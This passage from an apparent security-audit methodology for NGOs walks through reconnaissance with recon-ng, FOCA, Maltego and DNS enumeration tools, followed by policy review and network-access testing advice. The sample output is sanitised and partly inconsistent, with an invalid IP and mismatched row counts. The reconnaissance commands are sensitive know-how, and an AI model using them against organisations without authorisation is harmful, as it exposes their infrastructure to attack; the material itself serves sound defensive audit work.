[*] 96.127.170.121 => vps.websitename.org

SUMMARY

[*] 2 total (1 new) items found.

Now, exploring these hosts we realize quickly that most the new hosts on other domains are not associated with the company. Hence, we will remove them.

[recon-ng][websitename] > show hosts

  +-----------------------------------------------------------------------------------------------------------------------------------+
  | rowid |                     host                     |   ip_address   | region | country | latitude | longitude |      module     |
  +-----------------------------------------------------------------------------------------------------------------------------------+
  | 4     | dsl-177-154-167-69-dyn.prod-infinitum.com.mx | 177.154.167.69 |        |         |          |           | reverse_resolve |
  | 1     | vps.websitename.org                          | 174.154.167.69 |        |         |          |           | shodan_net      |
  | 2     | vps.websitename.org                          | 96.127.170.121 |        |         |          |           | shodan_net      |
  | 7     | vps.pineapplebob.net                         | 96.127.170.121 |        |         |          |           | shodan_net      |
  +-----------------------------------------------------------------------------------------------------------------------------------+

[*] 4 rows returned
[recon-ng][websitename] > del hosts
rowid(s) (INT): 4
[recon-ng][websitename] > del hosts
rowid(s) (INT): 7

We skip the last module recon/netblocks-ports/census_2012 since you already get the idea.

Sadly, none of the new domains were actually useful.

Let's find new domains using brute forcing. First we should look for what is available.

[recon-ng][websitename] > search domains-domains
[*] Searching for 'domains-domains'...

  Recon
  -----
    recon/domains-domains/brute_suffix
[recon-ng][websitename] > use recon/domains-domains/brute_suffix
[recon-ng][websitename][brute_suffix] > run

-------------
WEBSITENAME.ORG
-------------
[*] websitename.ac => No record found.
[*] websitename.academy => No record found.
[*] websitename.ad => No record found.
[*] websitename.ae => No record found.
[*] websitename.aero => No record found.
[*] websitename.af => (SOA) websitename.af - Host found!
[*] websitename.ag => No record found.
[*] websitename.ai => No record found.
[*] websitename.al => No record found.
[*] websitename.am => (SOA) websitename.am - Host found!
[*] websitename.an => No record found.
[*] websitename.ao => No record found.
[*] websitename.aq => (SOA) websitename.aq - Host found!
[*] websitename.ar => No record found.
[*] websitename.arpa => No record found.
[*] websitename.as => No record found.
[*] websitename.asia => No record found.
[*] websitename.at => No record found.
[*] websitename.au => No record found.
[*] websitename.aw => (SOA) websitename.aw - Host found!
[*] websitename.ax => No record found.
[*] websitename.az => No record found.
[*] websitename.ba => No record found.
[*] websitename.bb => No record found.
[*] websitename.bd => No record found.
[*] websitename.be => No record found.
[*] websitename.berlin =>  (SOA) websitename.berlin - Host found!
...

This returned quite a few domains. We have removed the middle section

[recon-ng][websitename][brute_suffix] > show domains

  +------------------------------------------+
  | rowid |       domain      |    module    |
  +------------------------------------------+
  | 2     | websitename.af      | brute_suffix |
  | 7     | websitename.am      | brute_suffix |
  | 4     | websitename.asia    | brute_suffix |
  | 5     | websitename.aq      | brute_suffix |
  | 7     | websitename.bg      | brute_suffix |
             ....
             ....
             ....
  | 25    | websitename.net     | brute_suffix |
  | 1     | websitename.org     | base         |
  | 17    | websitename.uz      | brute_suffix |
  +------------------------------------------+

Many out of scope domains had to be removed, but luckily you can specify ranges when you delete.

[recon-ng][websitename][brute_suffix] > del domains
rowid(s) (INT): 72-44

There are a lot of these, so we will only run one since there is little to nothing new to learn here.

[recon-ng][websitename][brute_suffix] > use recon/domains-hosts/baidu_site
[recon-ng][websitename][baidu_site] > run

------------
WEBSITENAME.EU
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.eu
[*] www.websitename.eu
[*] Sleeping to avoid lockout...

------------
WEBSITENAME.FR
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.fr

-------------
WEBSITENAME.ORG
-------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org
[*] www.websitename.org
[*] things.websitename.org
[*] Sleeping to avoid lockout...

----------------
WEBSITENAME.ORG.UK
----------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.org.uk

------------
WEBSITENAME.COM
------------
[*] URL: http://www.baidu.com/s?pn=0&wd=site%7Awebsitename.com
[*] www.websitename.com
[*] Sleeping to avoid lockout...

-------
SUMMARY
-------
[*] 5 total (2 new) items found.
[recon-ng][websitename][baidu_site] > use recon/domains-hosts/brute_hosts
[recon-ng][websitename][brute_hosts] > run

-------------
WEBSITENAME.ORG
-------------
[*] No Wildcard DNS entry found.
[*] 0.websitename.org => No record found.
[*] 01.websitename.org => No record found.
[*] 02.websitename.org => No record found.
[*] 03.websitename.org => No record found.
[*] 1.websitename.org => No record found.
[*] 10.websitename.org => No record found.
[*] 11.websitename.org => No record found.
[*] 12.websitename.org => No record found.
[*] 13.websitename.org => No record found.
[*] 14.websitename.org => No record found.
[*] 15.websitename.org => No record found.
[*] 16.websitename.org => No record found.
[*] 17.websitename.org => No record found.
[*] 18.websitename.org => No record found.
[*] 19.websitename.org => No record found.
[*] 2.websitename.org => No record found.
[*] 20.websitename.org => No record found.
[*] 3.websitename.org => No record found.
[*] 3com.websitename.org => No record found.
[*] 4.websitename.org => No record found.
[*] 5.websitename.org => No record found.
[*] 6.websitename.org => No record found.
...
...
[*] autodiscover.websitename.org => (CNAME) autodiscover.websitename-mail.org - Host found!
[*] autodiscover.websitename.org => (A) autodiscover.websitename.org - Host found!
[*] autorun.websitename.org => No record found.
[*] av.websitename.org => No record found.
...
...
[recon-ng][websitename] > show hosts

  +------------------------------------------------------------------------------------------------------------------+
  | rowid |               host              |   ip_address   | region | country | latitude | longitude |    module   |
  +------------------------------------------------------------------------------------------------------------------+
  | 8     | autodiscover.websitename-mail.org |                |        |         |          |           | brute_hosts |
  | 9     | autodiscover.websitename.org      |                |        |         |          |           | brute_hosts |
  | 32    | autodiscover.websitename.com       |                |        |         |          |           | brute_hosts |
  | 10    | conference.websitename.org        |                |        |         |          |           | brute_hosts |
  | 12    | beta.websitename.org              |                |        |         |          |           | brute_hosts |
  | 5     | demo.websitename.org            |                |        |         |          |           | baidu_site  |
  | 14    | email.websitename.org             |                |        |         |          |           | brute_hosts |
  | 15    | intranet.websitename.org               |                |        |         |          |           | brute_hosts |
  | 16    | ftp.websitename.org               |                |        |         |          |           | brute_hosts |
  | 37    | ftp.websitename.com                |                |        |         |          |           | brute_hosts |
  | 13    | ftp2.websitename.org              |                |        |         |          |           | brute_hosts |
  | 11    | websitename.github.com            |                |        |         |          |           | brute_hosts |
  | 24    | websitename.org                   |                |        |         |          |           | brute_hosts |
  | 75    | websitename.com                    |                |        |         |          |           | brute_hosts |
  | 18    | localhost.websitename.org         |                |        |         |          |           | brute_hosts |
  | 19    | mail.websitename.org              |                |        |         |          |           | brute_hosts |
  | 36    | mail.websitename.com               |                |        |         |          |           | brute_hosts |
  | 20    | ns1.websitename.org               |                |        |         |          |           | brute_hosts |
  | 27    | temp.websitename.org              |                |        |         |          |           | brute_hosts |
  | 25    | test.websitename.org              |                |        |         |          |           | brute_hosts |
  | 1     | vps.websitename.org               | 174.174.177.77 |        |         |          |           | shodan_net  |
  | 2     | vps.websitename.org               | 77.127.170.121 |        |         |          |           | shodan_net  |
  | 27    | webmail.websitename.com            |                |        |         |          |           | brute_hosts |
  | 4     | www.websitename.org               |                |        |         |          |           | baidu_site  |
  | 7     | www.websitename.com                |                |        |         |          |           | baidu_site  |
  +------------------------------------------------------------------------------------------------------------------+

[*] 77 rows returned

NOTE: Many host gathering modules use other hosts as a starting place. It is important to sanitize the hosts database between modules to make sure that you do start enumerating based upon incorrectly added hosts.

[recon-ng][websitename][census_2012] > query select hosts.ip_address, hosts.host, ports.host, ports.port from hosts join ports using (ip_address)

  +----------------------------------------------------------------------+
  |   ip_address   |           host           |        host       | port |
  +----------------------------------------------------------------------+
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 110  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 147  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 22   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 27   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 7707 |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 477  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 77   |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | vps.websitename.org        | vps.websitename.org | 777  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 110  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 147  |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 22   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 27   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 7707 |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 77   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 70   |
  | 174.174.177.77 | www.websitename.org        | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 110  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 147  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 22   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 27   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 7707 |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 477  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 77   |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 77.127.170.121 | things.websitename.org | vps.websitename.org | 777  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 110  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 147  |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 22   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 27   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 7707 |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 77   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 70   |
  | 174.174.177.77 | websitename.org            | vps.websitename.org | 777  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 110  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 147  |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 22   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 27   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 7707 |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 77   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 70   |
  | 174.174.177.77 | test.websitename.org       | vps.websitename.org | 777  |
  +----------------------------------------------------------------------+
Reconnaisance: Next Steps

Reporting

[recon-ng][websitename] > use reporting/csv
[recon-ng][websitename][csv] >
[recon-ng][websitename][csv] > set TABLE Domains
TABLE => Domains
[recon-ng][websitename][csv] > set FILENAME /home/computer/.recon-ng/workspaces/websitename/Domains.csv
FILENAME => /home/computer/.recon-ng/workspaces/websitename/Domains.csv
[recon-ng][websitename][csv] > run
[*] 5 records added to '/home/computer/.recon-ng/workspaces/websitename/Domains.csv'.

Creating API Keys


Foca Analyzer

FOCA Quick Guide

Requirements:

Installing FOCA analyzer

Features & Functionality

FOCA scanner has tons of great features from web searches and DNS searches as examples. To know more of functionalities, visit FOCA's website

Creating Your first Project:

To create a project in FOCA, click Project on the tab menu, and select New Project

There are few items to fill in FOCA:

After completing the forms, select the button Create

Scan and Search:

After saving your project, it will bring you to the main window. On the upper right hand corner of your screen, you will see the two settings:

Click the Search All buttong below the Extension options to start scan.

Note: FOCA will give you a warning regarding the IP address of the target and it’s netrange owner. This will be added to the alternative domain.

Analyzing Public Documents:

The results of FOCA depends on the files/documents uploaded to the website that are "publicly available". There are situations, where an organization may not have any publicly available documents. If that is the case, move next to the Maltego assessment activity.

However, if your scan generates files/documents scanned, you can may analyzing and extract metadata from the identified files/documents.

Downloading Files:

After when the search/scan has completed, right-click on any file, (NOTE: you can start downloading files one-by-one, or all at once by using SHIFT+SELECT. you can only extract metadata of files that are already downloaded). If the target website contains a lot of files and documents available, you may want to download all the files all at once.

Extracting Metadata:

After selecting a file/s that is/are downloaded, you may right-click and select Download Metadata You may start analyzing the files one-by-one of all at once. To do this, first, download all documents. Then, right-click, select Extract all Metadata. After Extracting your metadatas you can now right-click again, and select: analzye metadata. (There’s a green button that will appear once a file has been downloaded and analyzed. It will show download progress bars for each individual files and the time it takes time to download)

Analyzing Reports and Findings

After downloading documents and extracting metadata, you may view the results on the left side pane of your FOCA. On the left pane, you will see the following options:

Under Metadata you will have two sub-menus, Documents and Metadata Summary. The Documents, option displays scraped metadata per document/file. However, on Metadata Summary option, you will have the following options:

These information can then be added to your records and be used for other attack surface such as social engineering attacks.


Maltego

What is Maltego?

According to the Maltego's official website, they define maltego as: "An interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet.

Maltego uses the idea of transforms to automate the process of querying different data sources. This information is then displayed on a node based graph suited for performing link analysis."

Maltego has may different uses:

These are just some of the ways you can use Maltego. However with this guide, we will use Maltego for information gathering and data mining. The information we will find will later on be used in the following stages of audit/vulnerability assessment/penetration testing.

Maltego also has different versions:

For this exercise, we will be using the Maltego CE version.

Registration

Maltego is available in the latest release of Kali Linux. (See here) NOTE: To run Maltego, you first need to have an account. To register, click here. Consider carefully the operational security implications of this requirement, in particular if you use one account for multiple different audits.

Getting Started:

Before we proceed with this guide, let us first take a look on Maltego's 3 main important concept.

Running Maltego for the first time

To initialize Maltego, on your Kali Linux, click Applications > 01 - Information Gathering > Maltego. This will bring you to the "Home" screen of the Maltego application and will show you a list of available Transforms. Transforms are simply a set of activities that you can run against a specific target. We'll learn more of transforms in the following topics.

Creating a New Graph

To create a new graph where we can put our first task, click the Maltego icon on the upper left corner of your window, and click New. This will now open a blank screen, with the tab entitled New Graph.

Selecting Pallete Entity

Pallete is located on the left pane side called "Entity Pallete". This contains all the Entity that you can use depending on the activity that you are going to perform. For our exercise, look for the Domain entity pallete. Once you find it, drag it and drop it to the blank graph to the right. Now you have an entity on your graph. Try to double click the domain entity to rename it to your target (for this example, we can use paterva.com)

Choosing Transforms

Once you have edited your entity, you can right-click to open the Run Transform(s) option. You can see here all the available transforms you can use. (Depending on the transforms that you have installed)

For this exercise, click the + on the left side of PATERVA CTAS CE. This will give use 4 transforms:

You can run each of this transforms individually, or you can click the >> icon to run All Transforms.

Once you click it, all Transforms will run on the paterva.com domain. This graph result will include:

You can now then gather these results and use it for your next set of reconnaissance activity.

Recommendation

Website Footprinting

Summary

Using online tools as a starting point in assessing the auditee web application is a good way to expand online reconnaisance as well as start your vulnerability assessment. You can build a profile and a good understanding of the web application by identifying what comprises the web application and technologies behind. From there you can start your next move by putting together different strategies on conducting your vulnerability assessment.

For example, after discovering accessable web directories, you can then start looking for forgotten or abandoned files and applications that might contain sensitive information like (Passwords) or an outdated and vulnerable applications. Content management systems, while powerful, require ongoing maintenance and updates to stay secure. Quite often these (or specific plugins) fall out of date and become increasingly vulnerable to automated as well as targeted attacks.

Online tools offer ways of performing "passive" scans, in which your identity is hidden from the target organization, in cases where there are IDS/IPS, firewalls deployed. These should be used in conjuction with other outputs from reconnaisance to determine platforms and hosts which are out of scope.

Overview
Materials Needed
Considerations
Walkthrough

Before unleashing more advanced and powerful tools like OpenVAS, a few quick steps can help better guide your work. As a general note, surfing using a browser with at least NoScript enabled may help not only protect you, but may also help to reveal malware or adware infecting the websites.

Record core details about the website - determine the hosting provider, platform, Content Management Systems, and other baseline data. BuiltWith is a great tool. There are a few alternatives, including an open source tool, SiteLab. Note that BuiltWith is a tool bundled in recon-ng, but the output it provides is not currently stored in its data structures. These tools may also reveal plugins, javascript libraries, and DDoS protection systems like CloudFlare.

Tools


CMS Version Detection

Identification of CMS during web footprint can be done either using scripts and tools or using online services.

you can use certain websites to determine the type of CMS a target website is using:

For CMS systems, out of date components can mean well-known and easy to exploit by malicious actors.

Drupal For Drupal, try visiting /CHANGELOG.txt , which, if not manually removed, will reveal the most recent version of Drupal installed on the server. Other telltale signs depend on the specific Drupal release; http://corporate.adulmec.ro/blog/2010/drupal-detection-test-site-running-drupal maintains a detection tool.

Drupal 6.27, 2012-12-19
----------------------
- Fixed security issues (multiple vulnerabilities), see SA-CORE-2012-004.
Drupal 6.26, 2012-05-02
----------------------
- Fixed a small number of bugs.
- Made code documentation improvements.

Joomla For Joomla, default templates provide strong hints towards versions based on copyright dates. Specific versions can often be discovered using this guide: https://www.gavick.com/magazine/how-to-check-the-version-of-joomla.html

WordPress Wordpress sites tend to advertise their version number in the header of each webpage, such as

<meta name="generator" content="WordPress 3.3.1" />

There is a web-based tool with browser add-ons available here: http://www.whitefirdesign.com/tools/wordpress-version-check.html

Document your finding and list what type of CMS your target is using along with it's version. You can use this information in the next possible activities:


Recommendation

Most popular CMS platforms provide emailed alerts and semi-automated ways to update their software. Make sure someone responsible for the website is either receiving these emails or checking regularly for available updates. Security updates should be applied immediately. It is a best practice however to have a “test” site where you can first deploy any CMS update before attempting it on a production site.

For custom CMS systems, it is strongly advisable to migrate to a more standard, open source system.

An increasingly good practice is for organizations to take advantage of the "free" tiers of DDoS mitigation services, of which CloudFlare is probably the best known. A challenge of these free services can be that they have definite limits to their protection. With CloudFlare, organizations can request to be a part of their Project Galileo program to support at-risk sites even beyond their normal scope of support.

A community-based, open source alternative is Deflect, which is completely free for eligible sites.

Some of these services will be revealed by BuiltWith, but checking the HTTP Response Headers (in Chromium/Chrome, available under the Inspect Element tool, or by using Firebug in Firefox. See Deflect's wiki for more information.

Guide for NGOs about DDoS: Digital First Aid Kit

DNS Enumeration

Summary

DNS Stands for Domain Name Service. In a nutshell, what it does is translate hosts/computer's name into it's IP addresses. It provides a way to know the IP address of any given machine on the internet, with the corresponding URL, or domain. You can consider it as telephone directory of the Internet.

DNS enumeration is one of your initial steps in your overall vulnerability assessment and audit. It is one stage where it will allow you to discover more potential targets. Upon completion of this assessment stage, you may find issues such as leaked information caused by default settings and server misconfigurations. Along with these, you can also have a broader scope of targets, such as internal server IP addresses, company netblocks and domain/subdomain names.

DNS Enumeration can be accomplished with different number of tools along with different approaches. This guide will discuss some of the approaches and the tools required to perform each of the activities. You can perform DNS enumeration passively or actively, depending on your operational security needs.

Passive, or "indirect" approach refers to the enumeration process that doesn't send any traffic or packets from your machine, directly to your target. This can be done using 3rd tools such as online tools and cloud based scanners.

Active, or "direct" approach refers to sending DNS queries and enumeration tests directly to the target. Consider that traffic is send over the target which may leave traces or traffic logs coming from your source IP. Active techniques include Zone Transfer, Reverse Lookup, Domain and Host Brute-Forcing, Standard Record Enumeration (wildcard, SOA, MX, A, TXT etc), Cache snooping, and Zone Walking

Overview
Materials Needed
Considerations
Walkthrough

The flexibility of having multiple options in performing a DNS enumeration activity is the key for a successful enumeration. As a practice, comparing results can help in assuring that the information we gather is accurate. Your investigation may be blocked by CloudFlare, a popular DDoS protection service. "CloudFlair" provides some options in this case.

DNS Enumerations Tools:

Tools Description Type Technique
Robtex Gathers public information about IP numbers, domain names, host names, Autonomous systems, routes etc, then indexes the data in a big database and provide free access to that data Online Passive
DNSdumpster Free domain research tool that can discover hosts related to a domain, results with banners for HTTP, FTP, SSH & Telnet Online Passive
CentralOps-Domain Dossier Investigates domains and IP addresses. Gathers registrant information, DNS records, Network and Domain Whois Records, services scans and traceroutes Online Passive
DNSSEC Analyzer Checks for DNSSEC keys managment and configurations records Online Passive
Recon-ng Automated web reconnaissance framework written in Python. Complete with independent modules, database interaction, built-in convenience functions, interactive help and command completion. Script Active
IntoDNS IntoDNS checks the health and configuration of your DNS and provides report on MX records too. Provides suggestions to fix and improve findings Online Passive
YougetSignal Helps you find other sites being hosted on a particular IP address, verifying if the target is using a shared hosting service Online Passive
DNSRecon A Python script written by Carlos Perez for conducting DNS reconnaissance. It can enumerate general DNS records, perform zone transfers, perform reverse lookups, and brute-force subdomains among other functions. It will even perform Google scanning, automating the process we discussed in the Using Google to find subdomains section. Script Active
DNSenum multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks. Script Online

Specific instructions for selected tools/techniques follows:

Passive: Third Party and Online Tools

Using 3rd party and online tools can help an auditor/tester in avoiding his/her machine to generate logs on the target's end. In cases where the target, or partner organization who requests for an audit/assessment has some security devices in place (IDS/IPS, Firewall etc.) Generating logs from your machine/network may result sometimes in our traffic getting blocked due to "automatic blocking" features in these security devices/appliances.

Passive tools include:

Active: DNSrecon

DNSrecon (available in Kali 2017 Release) is a powerful DNS enumeration script that can help and auditor in gathering information during the recon stage. This tool checks all NS records for Zone transfers, enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT). Performs SRV record enumeration and TLD (Top Level Domain) Expansion to name some.

This exercise will help you in performing some of the DNS enumeration methods using DNSrecon and generate information which you can add to your database to be used for other avenues of testing.

Perform basic DNS enumeration on target:

 [email protected]:~# dnsrecon -d <target domain>

Perform DNS Zone Transfer enumeration:

 [email protected]:~# dnsrecon -d <target.domain> -a
 [email protected]:~# dnsrecon -d <target.domain> -t axfr

Perform Reverse Lookup:

 [email protected]:~# dnrecon -r <start-IP-to-end-IP>

Domain Brute-Force:

 [email protected]:~# dnsrecon -d <target.domain> -D <namelist> -t brt

Cache Snooping:

 [email protected]:~# dnsrecon -t snoop -n Sever -D <Dictionary>

Zone Walking:

 [email protected]:~# dnsrecon -d <target.domain> -t zonewalk
Active: DNSenum

DNSenum, just like DNSrecon, is a tool designed to analyze DNS information of a specific DNS target. From zone transfer, hostname and subdomain dictionary brute force, reverse lookup service record and standard record query and top level domain name expansion, results are almost identical for both assessment tools.

You can use DNSenum from the Kali terminal and MSF Console platform as an auxilliary.

To access DNSenum, simply type the command dnsenum. (You can add -h for help options.)

[email protected]:~# dnsenum

The table below will help you get started with your DNS enumeration using dnsenum tool.

DNS Command Description
dnsenum -h Display Help options
dnsenum domain.com Performs basic DNS enumeration
dnsenum --enum domain.com Performs fast enumeration (equivalent to --threads 5 -s 15 -w)
dnsenum -f list.txt -r <domain.com> Performing hostname and subdomain directory bruteforce using the list.txt file
dnsenum -f list.txt -s 5 -p 5 domain.com Enumerate using subdomain list,(list.txt) scrap 5 subdomains (-s), with 5 Google result pages (-p)
dnsenum -f list.txt -o result.xml internews.org Enumerate target with subdomain list (list.exe), generates output in XML format -o
Active:DNS Zone Transfer
Active: MX Records

MX, or Mail Exchange, records are required to be public for any domain you wish to receive email through. These records can still reveal sensitive information about an organization's hosting set-up and office software in use through further scanning (see Vulnerability Scanning). MX Records can reveal vulnerable mail servers or information about other services hosted internally. Unless other assessments reveals specific vulnerabilities in e-mail services used, there is no specific action to take. If an orgnization is self-hosting email, it may be advisable to suggest outsourcing that if funds permit. While self-hosted email provides more control and potentially security, managing the security of the server is a complex job. Other mail services can provide some level of protection by being a first-pass check for spam and viruses, and (slightly) reducing the visibility of an organizational mail server.

[email protected]:~# host -t mx sample.org
sample.org mail is handled by 21 mail.sample.org

Determine the IP address of the mail server:

[email protected]:~# host mail.sample.org
mail.sample.org has address 256.0.0.3
Recommendation

DNS is inherently public information, but we can still do a lot of steps to secure any parts of it which are revealing more private information. Fortinet provides a set of good recommendations:

https://blog.fortinet.com/2016/03/10/10-simple-ways-to-mitigate-dns-based-ddos-attacks

If a zone transfer was successful, (most providers automatically limit anonymous zone transfers), you will need to work with their support team to prevent this, or switch to a different DNS provider. If your organization maintains its own DNS servers, the administrator of those servers should check the zone transfer policies to prevent anonymous transfers.

Organizational Policy Review

Summary

This methodology explores existing organizational practices, informal agreements, and policies around managing information security and responding to threats. It also seeks to reveal presumptions made within the organization which are neither shared (informal or no) nor codified in policies.

Purpose

Many smaller organizations do not have formal policies around information security. This is not inherently a good or bad thing, as in their place are often informal agreements and practices. The goal of this component is to reveal any presumptions that are not shared, and help set more formalized agreements across the organization, and to cross-verify these policies, practices, guidelines, and informal agreements with what is actually taking place (generally using activities from data assessment and device assessment methodologies).

The Flow Of Information

User Device Assessment Information Flow
User Device Assessment Information Flow

Guiding Questions

Specific aspects to explore are:

Approaches

Outputs

Operational Security

Preparation

If (through interviews or even the audit agreement process); you have received copies of policies, a thorough review of the written policies is required to assess if they are being followed, enforced, or have changed since being formalized.

Resources

Organizational Policies

Activities

Identifying Informal Agreements

Summary

The activity aims to assess which kind of informal agreements regarding best practices and security directives are formulated, accessed, implemented and/or enforced across the organization

Overview
Materials Needed
Considerations
Walkthrough
  1. Build a list of situations where security policies, if followed, would prevent or reduce the impact of a problem; ideally using the Threat Modeling exercise and inputs from Process Mapping, Capacity Assessment, and other methods and activities. These situations can be related to regular operations (looking for best practices) and risks (looking for security procedures).

For small and medium sized organizations, arrange group conversations around a few specific what-if scenarios (this can be integrated in with the Data Mapping or Process Mapping approaches).

Discussions can include:

  1. Meet with members of the organization and present to them the situations on the previous list, asking if there are some codes or agreements regarding security aspects of the situations presented, take notes of the responses and possible differences between the criteria or knowledge of the agreements. This could be explained by the lack of documentation and formal ways to transmit the agreements

  2. Build a map of practices in three terms:

Recommendation

There must be a good understanding of the organizational capacity and commitment to implementing and maintaining formal security policies. Based on this assessment, consider beginning with more informal agreements among staff which still help centralize their approach to security and improve their preventative measures and ability to respond to incidents that is easy and effective to adopt. Encourage a "testing" phase of these practices for the organization to then begin formalizing the ones which work and test new approaches for any which did not continue.

Security policy review

Summary

The activity aims to understand the organization internal security policy context, looking for existing policies, understanding how they translate into practice and/or are enforced, and evaluating them and detecting potential improvements or updates.

Overview
Materials Needed
Considerations
Walkthrough
  1. Ask for documentation - this may come out of Capacity Assessment work
  2. Review documentation and compare with existing baselines, and against identified vulnerabilities - do these policies help mitigate risks? (see references)
  3. Propose a map like the one in the Identifying Informal Agreements activity
Recommendation

There must be a good understanding of the organizational capacity and commitment to implementing and maintaining formal security policies. Based on this assessment, consider beginning with more informal agreements among staff which still help centralize their approach to security and improve their preventative measures and ability to respond to incidents that is easy and effective to adopt. Encourage a "testing" phase of these practices for the organization to then begin formalizing the ones which work and test new approaches for any which did not continue.

Conduct Interviews

NOTE: Covered in full under Capacity Assessment

A Day in the Life

NOTE: Covered in full under Organizational Device Assessment

Network Mapping

Summary

This component allows the auditor to identify security issues with the host's network and map the devices on a host's network, the services that are being used by those devices, and any protections in place.

Purpose

Mapping an organization's network exposes the multitude of devices connected to it -- including mostly forgotten servers -- and provides the baseline for later work on device assessment and vulnerability research.

This process also reveals outside service usage (such as google services, dropbox, or others) which serve -- intentionally or not -- as shadow infrastructure for the organization. In combination with beacon research from the Monitor Open Wireless Traffic exercise, many devices can be associated with users.

The Flow Of Information

Network Mapping Information Flow
Network Mapping Information Flow

Guiding Questions

Approaches

Outputs

Operational Security

Preparation

Baseline Skills

Resources

Network Mapping Methods

Wireless Access Guides & Resources

Nmap Scanning

Activities

Wireless Range Mapping

Covered in full in Physical and Operational Security

This component consists of wireless scanning and wireless signal mapping. It is useful for organizations with offices in shared spaces/buildings/apartment complexes or near locations where an adversary could easily "listen" to network traffic. In conjuction with Monitoring Open Wireless Traffic exercise, it can also identify devices using that network. It is useful to do this in parallel with Office Mapping to build a more comprehensive view of the information assets of the organization.

Monitor open wireless traffic

Covered in full in Physical and Operational Security

Each wireless device maintains a "memory" of what networks it has successfully connected to. When it is connecting to a network, it sends out "probes" to all of the networks it has in this memory. It is important to note that this data gets broadcast widely, and can be collected without any network access, only proximity to the device.

These network probes can often contain names (especially from mobile phone tethers), organizational affiliations, device manufacturers, and a mixture of other potentially valuable data (home network names, recent airports/travel locations, cafés and conference networks). If there are many networks in the office's vicinity, this activity can also help identify the specific office network (if there is any doubt). In many cases, an organization may not want the name of their wireless network to be associated with their organization, but it may be revealed by this additional meta-data.

Beacons can "de-anonymize" an obfuscated network name as well as provide rich content for social engineering attacks. This provides an only-lightly-invasive introduction to discuss the trackability of devices, particularly mobiles and laptops.

Network Access

Summary

This activity helps auditors to test the strength of defenses the organizations' network has in place to protect their local area network. This component consists of gaining access to the local area network through a wireless access point and unsecured physical channels (such as an ethernet jack).

Overview

Note: Cracking wireless passwords often take a huge amount of time performing, and the same results for the audit and organizational buy-in can be had simply by showing how password cracking works, and how far outside of the office the wireless network can be seen. Once an organization is using vulnerable authentication method, you can flag it right away as "finding". Given that the recommendations are often the same (move to WPA2 (and WPA3 as available), disable WEP and WPS access, provide a separate guest network, etc.), this should rarely be used during an audit (but is a useful skill to practice and understand how it works). If you do choose to use this during an audit, be aware that many of the stps disrupt network traffic, and success with WPA2 password cracking is by no means guaranteed, so can backfire.

Considerations

Note: This section is one of the few sections where the SAFETAG audit does go through attack scenarios, from attempting to "break in" to the wireless network to testing exposed ethernet jacks for connectivity.

The reasons for this are threefold. First, access to an organization's internal network tends to reveal sensitive data and "shadow" infrastructures (such as dropbox usage) that lead to many recommendations to improve access control and discussions of the value of defense in depth. Second, the specific act of breaking the wifi password allows for a discussion on password security without attacking any specific user's password. Finally, with wireless networks treated as equivalent to wired networks in many offices, reminding the organization that wireless networks extend beyond the physical walls of the office is useful in discussing password rotation and guest network policies.

Once you have access to the network, you need to first document how you managed that and share it with the hosts. This is a great moment to discuss passwords in many cases.

Walkthrough

Breaking into network requires specialized tools as well as a significant amount of time in capturing authentication packets, and replaying those packets back to the wireless access point.

MAC filtering is a common, but easy to bypass security measure.

